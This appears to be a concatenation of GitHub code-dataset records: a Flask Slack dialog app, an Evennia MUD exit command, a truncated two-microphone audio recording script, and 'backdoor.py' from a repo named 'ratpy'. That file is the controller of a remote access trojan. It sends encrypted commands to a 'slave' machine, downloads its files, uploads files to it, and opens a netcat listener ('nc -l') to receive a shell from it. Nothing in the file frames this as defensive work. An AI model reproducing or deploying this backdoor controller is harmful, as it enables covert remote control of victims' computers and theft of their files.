import flaskrun\nfrom config import SlackConfig \nfrom slacker import Slacker\nimport os\nimport traceback\n\napplication = Flask(__name__)\n\nlogWebhookUrl = SlackConfig.LOG_CHANNEL_WEBHOOK\nretroWebhookUrl = SlackConfig.RETRO_CHANNEL_WEBHOOK\n\n#Sends a message to the slack channel\ndef sendSlackChannel(logWebhookUrl, message):\n    data = {\"text\": message} #json.loads(data)\n    response = requests.post(logWebhookUrl, data=json.dumps(data), headers={'Content-Type': 'application/json'})\n    return \"Result : \" + str(response.status_code) + ' -- ' + response.text\n\n#Sends a message to the slack retrobox channel\ndef sendRetroMessage(logWebhookUrl, userName, messageDetail, username_allowed = \"no\" ) :\n    api_url = '\thttps://slack.com/api/chat.postMessage'\n\n    data = ''\n    with open('message.txt', encoding='utf-8') as json_file:\n        data = json.load(json_file)\n    if username_allowed == \"yes\":\n        json_format = json.dumps(data).replace(\"#user_name\", userName).replace(\"#message_detail\", messageDetail)\n    else :\n        json_format = json.dumps(data).replace(\"#user_name\", \"Anonymous\").replace(\"#message_detail\", messageDetail)\n\n    res = requests.post(logWebhookUrl, data=json_format, headers={'Content-Type': 'application/json'})\n    return str(res) + str(res.content)\n\n\n@application.route('/interactivePost', methods=['POST'])\ndef interactivePost() :\n    try :\n        payload = json.loads(request.form[\"payload\"])\n\n        message = ':mega: *Info:* retro command called. *Command: *' + str(payload[\"type\"])+ '```' + str(request.form) + '```'\n        sendSlackChannel(logWebhookUrl, message)\n\n        # If the command is being run for the first time \n        if payload[\"type\"] == \"shortcut\" : \n            api_url = 'https://slack.com/api/dialog.open'\n\n            trigger_id = request.form.get('trigger_id')\n\n            dialog = {\n                \"callback_id\": \"ryde-46e2b0\",\n                \"title\": \"Retro Box\",\n                \"submit_label\": \"Request\",\n                \"notify_on_cancel\": True,\n                \"state\": \"first_place\",\n                \"elements\": [\n                    {\n                        \"type\": \"textarea\",\n                        \"label\": \"Anything you can throw in our retro box?\",\n                        \"name\": \"comment\",\n                        \"placeholder\": \"Let me think...\",\n                        \"hint\" : \"Allons-y...\"\n                    },\n                    {\n                        \"type\": \"select\",\n                        \"label\": \"How do you feel?\",\n                        \"name\": \"feeling\",\n                        \"value\": \"no_comment\",\n                        \"hint\" : \"I wish you to be happy....\",\n                        \"options\": [\n                            {\n                                \"label\": \"I feel very good\",\n                                \"value\": \"so_good\"\n                            },\n                            {\n                                \"label\": \"I feel good\",\n                                \"value\": \"good\"\n                            },\n                            {\n                                \"label\": \"So so\",\n                                \"value\": \"so_so\"\n                            },{\n                                \"label\": \"I feel bad.\",\n                                \"value\": \"bad\"\n                            },\n                            {\n                                \"label\": \"No comment\",\n                                \"value\": \"no_comment\"\n                            } \n                        ]\n                    },\n                    {\n                        \"type\": \"select\",\n                        \"label\": \"Would you like us to post your username?\",\n                        \"name\": \"username_allowed\",\n                        \"value\": \"no\",\n                        \"hint\" : \"If you say no, everything is between us...\",\n                        \"options\": [\n                            {\n                                \"label\": \"Yes\",\n                                \"value\": \"yes\"\n                            },\n                            {\n                                \"label\": \"No\",\n                                \"value\": \"no\"\n                            }\n                        ]\n                    }\n                ]\n            }\n\n            api_data = {\n                \"token\": SlackConfig.TOKEN,\n                \"trigger_id\": payload[\"trigger_id\"],\n                \"dialog\": json.dumps(dialog)\n            }\n\n            res = requests.post(api_url, data=api_data)\n            message = ':mega: *res:* ' + str(res.content)\n            sendSlackChannel(logWebhookUrl, message)\n\n        elif payload[\"type\"] == \"dialog_submission\" : \n            sendRetroMessage(logWebhookUrl, str(payload[\"user\"][\"name\"]), str(payload[\"submission\"][\"comment\"]), str(payload[\"submission\"][\"username_allowed\"]))\n            sendRetroMessage(retroWebhookUrl, str(payload[\"user\"][\"name\"]), 
str(payload[\"submission\"][\"comment\"]), str(payload[\"submission\"][\"username_allowed\"]))\n\n\n        elif payload[\"type\"] == \"dialog_cancellation\" : \n            message = \"CANCELLATION\"\n            sendSlackChannel(logWebhookUrl, message)\n\n        else :\n            message = \"NOT UNDERSTOOD\"\n            sendSlackChannel(logWebhookUrl, message)\n\n\n    except Exception as error:\n        return make_response(\"Error!\" + str(error), 200)\n\n    return make_response(\"\", 200)\n\n\nif __name__ == '__main__':\n    flaskrun(application)", "repo_name": "sevvalkahraman/slack-open-dialog-with-python", "sub_path": "application.py", "file_name": "application.py", "file_ext": "py", "file_size_in_byte": 5585, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "config.SlackConfig.LOG_CHANNEL_WEBHOOK", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.SlackConfig", "line_number": 13, "usage_type": "name"}, {"api_name": "config.SlackConfig.RETRO_CHANNEL_WEBHOOK", "line_number": 14, "usage_type": "attribute"}, {"api_name": "config.SlackConfig", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 19, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 19, "usage_type": "call"}, {"api_name": "json.load", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 43, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "config.SlackConfig.TOKEN", "line_number": 115, "usage_type": "attribute"}, {"api_name": "config.SlackConfig", "line_number": 115, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 117, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "29850008708", "text": "# -*- coding: UTF-8 -*-\nfrom commands.command import MuxCommand\nfrom evennia.utils import search\nfrom evennia.utils import create\nfrom django.conf import settings\nfrom django.db.models import Q\nfrom evennia.objects.models import ObjectDB\nfrom evennia.utils.utils import inherits_from, class_from_module\n\n\nclass CmdExit(MuxCommand):\n    \"\"\"\n    Simple destinations are stored on the room in its 'exits' attribute in a dictionary.\n    All simple exits on the room use the same attribute, compared to object-based exits,\n    which create a new database object. 
Simple exits use much less database space.\n    Actual exit objects supersede simple exits in every way.\n    Usage:\n    |w<|ydirection|w>[|glist of switches|w] [|ydestination|w]|n\n    Options:\n    |g/add|n [name starts with or alias] adds simple exit to destination in the given direction.\n    |g/del|n removes simple exit in given direction.\n    |g/tun|n adds simple exit from destination in opposite direction.\n    |g/both|n adds simple exit to destination and back in opposite direction.\n    |g/none|n removes simple exit to destination and back in opposite direction.\n    |g/new|n [name;alias;...] creates a new room of given name as destination.\n    |g/go|n after any above operations, move to destination.\n    |g/show|n shows room exit information and back exit from .\n\n    Options combine in some combinations, e.g. west/none/go would remove the exits\n    into and out of the room in the given direction, then take you to the destination room.\n\n    This command never deletes rooms, but can create them in a simple fashion when needed.\n    \"\"\"\n    locks = 'cmd:all()'\n    arg_regex = r'^/|\\s|$'\n    help_category = 'Travel'\n    auto_help = True\n    account_caller = True\n\n    def func(self):\n        \"\"\"Command for all simple exit directions.\"\"\"\n        you = self.character\n        loc = you.location\n        account = self.account\n        cmd = self.cmdstring\n        switches = self.switches\n        args = self.args.strip()\n        direction = self.aliases[0]\n        dest = None  # Hopeful destination for exits and moving to.\n        switches = self.switches\n        switches_list = [u'add', u'del', u'tun', u'both', u'none', u'new', u'go', u'show']\n\n        if switches and not all(x in switches_list for x in switches):\n            account.msg(\"You used an unknown switch for |530%s|n. Use only these: |g/%s\" %\n                        (self.key, \"|n, |g/\".join(switches_list)))\n            return\n\n        def new_room(room_name):\n            \"\"\"\n            print(\"-----\")\n            print(\"New Room creation details.\")\n            print(\"Name: %s\" % room['name'])\n            print(\"Aliases: %s\" % room['aliases'])\n            print(\"Type: %s\" % typeclass)\n            print(\"Lock: %s\" % lockstring)\n            print(\"=====\")\n            \"\"\"\n            if not account.check_permstring('Builders'):\n                you.msg(\"You must have |wBuilders|n or higher access to create a new room.\")\n                return None\n\n            name, aliases = '', []\n            if ';' in room_name:  # Parse aliases out of room_name.\n                name, aliases = room_name.strip().split(';', 1)\n                aliases = aliases.split(';')\n            else:  # No aliases provided; aliases remain empty.\n                name = room_name.strip()\n\n            typeclass = settings.BASE_ROOM_TYPECLASS\n            room = {'name': name, 'aliases': aliases}\n            lockstring = \"control:pid({0}) or perm(Immortals); delete:pid({0})\" \\\n                         \" or perm(Wizards); edit:pid({0}) or perm(Wizards); get:false()\"\\\n                .format(account.id)\n            r = create.create_object(typeclass, room['name'], aliases=room['aliases'], report_to=you)\n            r.locks.add(lockstring)\n            alias_string = room['aliases']\n            if r.aliases.all():\n                alias_string = \" |w(|c%s|w)|n\" % \"|n, |c\".join(r.aliases.all())\n            account.msg(\"|gCreated room %s%s of type |m%s.\" % (r.get_display_name(account), alias_string, typeclass))\n            return r or None\n\n        def find_by_name(search):\n            search = search.strip().split(';', 1)[0]\n            keyquery = Q(db_key__istartswith=search)\n            aliasquery = Q(db_tags__db_key__istartswith=search,\n                           db_tags__db_tagtype__iexact='alias')\n\n            results = ObjectDB.objects.filter(keyquery | aliasquery).distinct()\n            nresults = results.count()\n\n            if nresults:  # convert multiple results to typeclasses.\n                results = [result for result in results]\n                room_typeclass = settings.BASE_ROOM_TYPECLASS  # Narrow results to only room 
types.\n results = [obj for obj in results if inherits_from(obj, room_typeclass)]\n return results\n\n def add(you_add, loc_add, ways_add):\n \"\"\"\"Command for adding an exit - checks location and permissions.\"\"\"\n results = find_by_name(self.args)\n if not results:\n account.msg('Destination \"|r%s|n\" was not valid.' % args)\n result = None\n else:\n result = results[0] # Arbitrarily select the first result of usually only one.\n ways_add[direction] = result\n you_add.msg(\"|ySearch found|n (%s)\" % result.get_display_name(you) if result else None)\n if not result:\n account.msg('Destination \"|r%s|n\" was not valid.' % args)\n return None\n if ways_add[direction]:\n if loc_add.access(you_add, 'edit'):\n if ways_add[direction].access(you_add, 'control'):\n loc_add.db.exits = ways_add\n you_add.msg(\"|gAdded|n exit |lc%s|lt|530%s|n|le from %s to %s.\" %\n (self.key, self.key, loc_add.get_display_name(account),\n ways_add[direction].get_display_name(account)))\n else:\n you_add.msg(\"You do not control the destination, so can not connect an exit to it.\")\n else:\n you_add.msg(\"You have no permission to edit here.\")\n return ways_add[direction]\n account.msg(\"You typed command (|y%s|n), switches (|%s|n), with no valid destination.\" %\n (cmd, switches))\n account.msg('Destination \"|r%s|n\" was not valid.' % args)\n return None\n\n def back_dir(x):\n return {'n': 's', 's': 'n', 'e': 'w', 'w': 'e',\n 'nw': 'se', 'se': 'nw', 'ne': 'sw',\n 'sw': 'ne', 'u': 'd', 'd': 'u'}[x]\n\n def long_dir(x):\n return {'n': 'north', 's': 'south', 'e': 'east', 'w': 'west', 'nw': 'northwest', 'se': 'southeast',\n 'ne': 'northeast', 'sw': 'southwest', 'u': 'up', 'd': 'down'}[x]\n\n def tun(you_tun, loc_tun, dest_tun, dir_tun):\n \"\"\"Command for tunneling an exit back - checks existing exits, location and permissions.\"\"\"\n tun_ways = dest.db.exits or {}\n tun_way = tun_ways.get(back_dir(dir_tun))\n if tun_way: # Is the direction in the room's exit dictionary?\n return None\n else:\n tun_ways[back_dir(dir_tun)] = loc_tun\n if dest_tun.access(you_tun, 'control'):\n dest_tun.db.exits = tun_ways\n you_tun.msg(\"|gAdded|n exit |530%s|n back from %s to %s.\" %\n (long_dir(back_dir(dir_tun)), dest_tun.get_display_name(account),\n loc_tun.get_display_name(account)))\n else:\n you_tun.msg(\"You do not control the destination, so can not connect an exit to it.\")\n\n if switches: # Provide messages giving feedback for Tria\n switch_list = '/' + '/'.join(switches)\n if args:\n account.msg(\"Showing direction, switches, destination: |y%s|g%s |y%s\" %\n (cmd, switch_list, args))\n else:\n account.msg(\"Showing direction and switches: |y%s|g%s|n, but no destination was given.\" %\n (cmd, switch_list))\n if 'add' in switches or 'new' in switches or 'both' in switches:\n account.msg(\"Without a destination, |g/add|n or |g/new|n can not be done.\")\n else:\n if args:\n account.msg(\"Showing direction and destination: |y%s %s|n (No switches were provided - nothing to do.)\"\n % (cmd, args))\n if 'new' in switches and not args:\n you.msg(\"|g%s|r/new|n requires a destination room to be given, e.g. |g%s/new |yWilderness\" % (cmd, cmd))\n return\n if 'add' in switches or 'both' in switches:\n if not args:\n you.msg(\"|g%s|r/add|n requires a destination room to be given, e.g. 
|g%s/add |yWilderness\" %\n (cmd, cmd))\n return # No further action, not even check for /go.\n if 'del' in switches or 'none' in switches: # Can't do both!\n you.msg(\"|rThose switches are mutually exclusive; do not do both!\")\n return # No further action, not even check for /go.\n if you.location.db.exits: # Does an 'exits' attribute exist (and not None or False)?\n ways = loc.db.exits\n way = ways.get(direction)\n if way: # Direction in the room's exit dictionary should know room.\n dest = way\n if 'del' in switches or 'none' in switches:\n dest = way\n tunnel_way = back_dir(direction)\n tunnel_ways = dest.db.exits\n if loc.access(you, 'edit'):\n del(ways[direction])\n loc.db.exits = ways\n you.msg(\"|rRemoved|n exit |530%s|n from %s.\" % (self.key, loc.get_display_name(account)))\n if ('tun' in switches or 'none' in switches) and tunnel_ways:\n if dest.access(you, 'edit'):\n del(tunnel_ways[tunnel_way])\n dest.db.exits = tunnel_ways\n you.msg(\"|rRemoved|n exit |530%s|n from %s.\" %\n (long_dir(tunnel_way), dest.get_display_name(account)))\n else:\n you.msg(\"You have no permission to edit here.\")\n elif 'add' in switches or 'both' in switches:\n if loc.access(you, 'edit'):\n you.msg(\"Exit |530%s|n to %s leading to %s already exists here.\" %\n (self.key, loc.get_display_name(account), dest.get_display_name(account)))\n else:\n you.msg(\"You have no permission to edit here.\")\n if ('tun' in switches or 'both' in switches) and not ('del' in switches or 'none' in switches):\n tun(you, loc, dest, direction) # Add is done, now see if tun can be done.\n if 'new' in switches:\n you.msg(\"Can't make a new room, already going to %s.\" % dest)\n if 'go' in switches or not switches:\n if 'show' in switches:\n you.msg(\"Ignoring |g/show|n switch; you must use it separately.\")\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(dest)\n else: # No direction in the room's exit dictionary goes that way. Or direction goes to None.\n if 'new' in switches:\n dest = new_room(self.args)\n if 'add' in switches or 'both' in switches:\n add(you, loc, ways)\n elif 'del' in switches or 'none' in switches:\n if direction in ways:\n del(ways[direction])\n you.msg(\"Exit |530%s|n was not valid. 
(|rremoved|n)\" % self.key)\n else:\n you.msg(\"Exit |530%s|n does not exist here.\" % self.key)\n if 'tun' in switches or 'both' in switches:\n dest = ways.get(direction)\n if dest:\n tun(you, loc, dest, direction) # Add is done, now see if tun can be done.\n else:\n if self.args:\n you.msg(\"|ySearching|n for \\\"%s\\\" to the %s.\" % (self.args, self.key))\n dest = find_by_name(self.args)\n if dest:\n dest = dest[0]\n you.msg(\"|gFound|n \\\"%s\\\" to the %s.\" % (dest, self.key))\n tun(you, loc, dest, direction) # Add not done, but see if tun can be done.\n else:\n you.msg(\n \"|rDestination room not found|n \\\"{0:s}\\\" to the {1:s} when searching by: {2:s}.\"\n .format(dest, self.key, self.args))\n else:\n you.msg(\"|yYou must supply a name or alias of the target room.|n\")\n if 'go' in switches:\n if 'show' in switches:\n you.msg(\"Ignoring |g/show|n switch; you must use it separately.\")\n if 'add' in switches or 'both' in switches:\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(ways[direction])\n else:\n if ('tun' in switches or 'both' in switches) and dest:\n if 'show' in switches:\n you.msg(\"Ignoring |g/show|n switch; you must use it separately.\")\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(dest)\n if not switches:\n if direction in ways:\n del(ways[direction])\n you.msg(\"Exit |530%s|n was not valid. (|rremoved|n)\" % self.key)\n else:\n you.msg(\"You cannot travel %s.\" % self.key)\n else: # No simple exits from this location.\n ways = {}\n way = None\n dest = way\n if 'new' in switches:\n dest = new_room(self.args)\n if 'add' in switches or 'both' in switches:\n dest = add(you, loc, ways)\n elif 'del' in switches or 'none' in switches:\n if 'tun' in switches or 'both' in switches:\n # TODO: If 'tun' option is also used -\n # there is no easy way to find it to delete it.\n pass\n else:\n you.msg(\"No simple exit |530%s|n to delete.\" % self.key)\n if ('tun' in switches or 'both' in switches) and ('del' not in switches and 'none' not in switches):\n if 'add' in switches or 'both' in switches:\n dest = ways[direction]\n tun(you, loc, dest, direction) # Add is done, now see if tun can be done.\n else:\n # TODO: Test - does this only work with 'add' option?\n # It requires a destination, if not.\n pass\n if 'go' in switches and way:\n if 'show' in switches:\n you.msg(\"No simple exits to |g/show|n in this room.\")\n you.ndb.moving_to = long_dir(direction)\n you.ndb.moving_from = long_dir(back_dir(direction))\n you.ndb.exit_used = direction\n you.move_to(dest)\n if not switches:\n you.msg(\"You cannot travel %s.\" % self.key)\n if 'show' in switches and 'go' not in switches:\n if not account.check_permstring('Helpstaff'):\n you.msg(\"You must have |gHelpstaff|n or higher access to use this.\")\n return None\n if you.location.attributes.has('exits'): # Does an 'exits' attribute exist?\n ways = loc.db.exits\n if direction in ways:\n dest = ways[direction] if ways else None\n you.msg(\"|wSimple exits report: %s exist in %s: %s\" %\n (len(ways), you.location.get_display_name(you), ways))\n tunnel_ways = None\n if dest:\n tunnel_ways = dest.db.exits\n if tunnel_ways:\n you.msg(\"|wSimple exit report|n: exists in %s going |530%s|n back to %s.\" %\n (dest.get_display_name(you), long_dir(back_dir(direction)),\n you.location.get_display_name(you)))\n else:\n you.msg(\"No simple exits exist in %s.\" 
% you.location.get_display_name(you))\n\n\nclass CmdExitNorth(CmdExit):\n __doc__ = CmdExit.__doc__\n key = \"north\"\n aliases = ['n']\n\n\nclass CmdExitNortheast(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'northeast'\n aliases = ['ne']\n\n\nclass CmdExitNorthwest(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'northwest'\n aliases = ['nw']\n\n\nclass CmdExitEast(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'east'\n aliases = ['e']\n\n\nclass CmdExitSouth(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'south'\n aliases = ['s']\n\n\nclass CmdExitSoutheast(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'southeast'\n aliases = ['se']\n\n\nclass CmdExitSouthwest(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'southwest'\n aliases = ['sw']\n\n\nclass CmdExitWest(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'west'\n aliases = ['w']\n\n\nclass CmdExitUp(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'up'\n aliases = ['u']\n\n\nclass CmdExitDown(CmdExit):\n __doc__ = CmdExit.__doc__\n key = 'down'\n aliases = ['d']\n", "repo_name": "Pinacolada64/NOW", "sub_path": "commands/exitdirections.py", "file_name": "exitdirections.py", "file_ext": "py", "file_size_in_byte": 18543, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "52", "api": [{"api_name": "commands.command.MuxCommand", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.settings.BASE_ROOM_TYPECLASS", "line_number": 79, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 79, "usage_type": "name"}, {"api_name": "evennia.utils.create.create_object", "line_number": 84, "usage_type": "call"}, {"api_name": "evennia.utils.create", "line_number": 84, "usage_type": "name"}, {"api_name": "evennia.utils.search", "line_number": 93, "usage_type": "name"}, {"api_name": "evennia.utils.search.strip", "line_number": 93, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 94, "usage_type": "call"}, {"api_name": "evennia.utils.search", "line_number": 94, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 95, "usage_type": "call"}, {"api_name": "evennia.utils.search", "line_number": 95, "usage_type": "name"}, {"api_name": "evennia.objects.models.ObjectDB.objects.filter", "line_number": 98, "usage_type": "call"}, {"api_name": "evennia.objects.models.ObjectDB.objects", "line_number": 98, "usage_type": "attribute"}, {"api_name": "evennia.objects.models.ObjectDB", "line_number": 98, "usage_type": "name"}, {"api_name": "django.conf.settings.BASE_ROOM_TYPECLASS", "line_number": 103, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 103, "usage_type": "name"}, {"api_name": "evennia.utils.utils.inherits_from", "line_number": 104, "usage_type": "call"}]}
{"seq_id": "20500579967", "text": "from sys import stderr\nfrom subprocess import call\nfrom os import mkdir, listdir, fork, wait\nfrom socket import error as socket_error\nimport os.path\n\nfrom utils.crypto import encrypt, decrypt\nfrom utils.utils import clear\n\ndef get_cmd():\n cmd = \"\"\n while cmd == \"\":\n cmd = input(\"[backdoor_shell] >>> \")\n return cmd\n\n\ndef send_cmd(conn, cmd):\n try:\n cmd = bytes(cmd, 'utf-8')\n crypt_cmd = encrypt(cmd)\n conn.send(crypt_cmd)\n except socket_error:\n stderr.write(\"Error sending command\\n\")\n return conn \n\n\ndef drop_shell(shell_port, status):\n pid = fork()\n if pid == 0:\n clear()\n print(\"\\n[*] Dropping shell on slave machine ...\")\n print(\"[+] Exit netcat sending SIGINT\")\n cmd = \"nc -l \" + 
str(shell_port)\n _ = call(cmd.split(\" \"))\n else:\n wait()\n return status \n\n\ndef recv_msg(conn, buffer):\n msg = \"\"\n try:\n crypt_msg = conn.recv(buffer)\n msg = decrypt(crypt_msg) \n msg = msg.decode('utf-8')\n except socket_error:\n stderr.write(\"[x] Error receiving response\\n\")\n return conn, msg\n\n\ndef builtin_cmds(conn, cmd, shell_port, status):\n status = 0\n msg = \"\"\n if cmd[:5] == \"shell\":\n cmd += str(shell_port)\n conn = send_cmd(conn, cmd)\n status = drop_shell(shell_port, status)\n elif cmd[:2] == \"ls\":\n conn = send_cmd(conn, cmd)\n conn, msg = recv_msg(conn, 64000)\n elif cmd[:5] == \"clear\":\n clear()\n msg = \"ACK\\n\"\n elif cmd[:4] == \"exit\":\n status = 1\n elif cmd[:2] == \"dl\":\n conn = send_cmd(conn, cmd)\n conn, msg = recv_msg(conn, 64000)\n with open(\"dump/\"+str(cmd)[3:], \"w\") as fp:\n fp.write(msg[3:])\n elif cmd[:2] == \"pl\":\n conn = send_cmd(conn, cmd[:2])\n clear()\n for file in listdir():\n print(file)\n filename = input(\"$ \")\n with open(filename, \"r\") as fp:\n data = fp.read()\n conn = send_cmd(conn, data)\n msg = \"[+] File uploaded to slave machine\"\n elif cmd[:3] == \"cat\":\n filename = cmd[3:]\n conn = send_cmd(conn, cmd)\n conn, msg = recv_msg(conn, 64000)\n else:\n msg = \"[x] Command not found\"\n return conn, status, msg\n\ndef validate_msg(msg):\n slave_ack = msg[:3]\n msg = msg[3:]\n if slave_ack != \"ACK\":\n stderr.write(\"[x] Slave did not acknowledge the command\\n\")\n elif msg[:3] == \"404\":\n print(\"Error message from slave: %s\" % (msg[3:]))\n else:\n print(\"%s\\n\" % msg)\n\n\ndef display_response(conn, msg):\n if msg == \"\":\n conn, msg = recv_msg(conn, 1024)\n validate_msg(msg)\n return conn\n\n\ndef cmd_shell(conn, shell_port, status):\n while status != 1:\n cmd = get_cmd()\n conn, status, msg = builtin_cmds(conn, cmd, shell_port, status)\n conn = display_response(conn, msg)\n\n\ndef backdoor_run(conn, shell_port):\n print(\"\\n[+] Running backdoor...\")\n if not os.path.isdir(\"dump\"):\n mkdir(\"dump\")\n status = 0\n cmd_shell(conn, shell_port, status)\n", "repo_name": "rodfer0x80/ratpy", "sub_path": "src/master/tools/backdoor.py", "file_name": "backdoor.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "utils.crypto.encrypt", "line_number": 19, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 21, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 22, "usage_type": "name"}, {"api_name": "os.fork", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.utils.clear", "line_number": 29, "usage_type": "call"}, {"api_name": "os.wait", "line_number": 35, "usage_type": "call"}, {"api_name": "utils.crypto.decrypt", "line_number": 43, "usage_type": "call"}, {"api_name": "socket.error", "line_number": 45, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.utils.clear", "line_number": 61, "usage_type": "call"}, {"api_name": "utils.utils.clear", "line_number": 72, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 92, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.isdir", 
"line_number": 115, "usage_type": "call"}, {"api_name": "os.path", "line_number": 115, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "27563142870", "text": "from python_speech_features import mfcc\nfrom python_speech_features import logfbank\nfrom python_speech_features import fbank\nfrom scipy import signal as sg\nimport librosa\nimport scipy.io.wavfile as wav\nfrom pyAudioAnalysis import audioFeatureExtraction\nimport os.path as path\nimport sounddevice as sd\nimport threading\nfrom csv import reader\nfrom multiprocessing import Process\nimport time\nfrom scipy.io import wavfile\nimport sounddevice as sd\nimport soundfile as sf\nimport time\nfrom pydub import AudioSegment\nfrom pydub import AudioSegment, silence\nimport wave\nimport numpy as np\nimport warnings\nimport gc\nfrom scipy import fftpack\nimport pylab as plt\nimport warnings\nimport datetime\nimport pandas as pd\nimport csv\nfrom scipy.signal import fftconvolve\nfrom scipy.signal import convolve\nimport pandas as pd\n#import ray\n#ray.init()\n\nwarnings.simplefilter(\"ignore\", DeprecationWarning)\n\n#############################################3\n\ndef show(data, data2):\n import numpy as np\n import wave\n import pylab as plt\n import random\n import struct\n warnings.simplefilter(\"ignore\", DeprecationWarning)\n signal = np.frombuffer(data, 'Int16')\n signal2 = np.frombuffer(data2, 'Int16')\n plt.figure(1)\n time = np.linspace(0, len(signal) / fs, num=len(signal))\n time2= np.linspace(0, len(signal2) / fs, num=len(signal2))\n a = plt.subplot(211)\n plt.plot(time, signal ,label='señal 1')\n plt.plot(time2, signal2 ,label='señal 2')\n plt.xlabel('Tiempo') # Colocamos la etiqueta para el eje x\n plt.ylabel('Amplitud (unidad desconocida)') # Colocamos la etiqueta para el eje y\n a.legend()\n a.set_ylim([-4000, 4000])\n b= plt.subplot(212)\n plt.plot(time2, signal2, label='señal2')\n plt.plot(time, signal,label='señal 1')\n plt.xlabel('Tiempo') # Colocamos la etiqueta para el eje x\n plt.ylabel('Amplitud (unidad desconocida)') # Colocamos la etiqueta para el eje y\n b.legend()\n b.set_ylim([-4000, 4000])\n plt.show()\n\n#derecha\n#@ray.remote\ndef ejecutar_doc1(tiempo):\n print(\"ejecuto 1\")\n fs = 44100\n sd.default.samplerate = fs\n # print(fs)\n sd.default.channels = 1\n # derecho\n sd.default.device = (3,None)\n duration = 4\n value=duration * fs\n myrecording = sd.rec(int(value), samplerate=fs, channels=(1))\n sd.wait()\n print(\"grabando1\")\n sd.stop()\n print(\"grabado1\")\n sf.write('1_{}.wav'.format(tiempo), myrecording, fs)\n#izquierda\n#@ray.remote\ndef ejecutar_doc2(tiempo):\n print(\"ejecuto 2\")\n fs = 44100\n sd.default.samplerate = fs\n # print(fs)\n sd.default.channels = 1\n duration = 4\n sd.default.device = (4,None)\n value2= duration * fs\n myrecording2 = sd.rec(int(value2), samplerate=fs, channels=(1))\n sd.wait()\n print(\"grabando2\")\n sd.stop()\n print(\"grabado1\")\n sf.write('2_{}.wav'.format(tiempo), myrecording2, fs)\n\ndef sonidos_detectados():\n myaudio = AudioSegment.from_wav(\"a1.wav\")\n myaudio2 = AudioSegment.from_wav(\"b1.wav\")\n silencio = silence.detect_nonsilent(myaudio, min_silence_len=1, silence_thresh=-32)\n silencio2 = silence.detect_nonsilent(myaudio2, min_silence_len=1, silence_thresh=-32)\n print(len(silencio))\n\nif __name__ == '__main__':\n if (path.exists('nombres_diferencias.csv'))==False:\n print(\"Generando archivos necesarios\")\n df = pd.DataFrame(columns=['nombres', 'distancias'])\n 
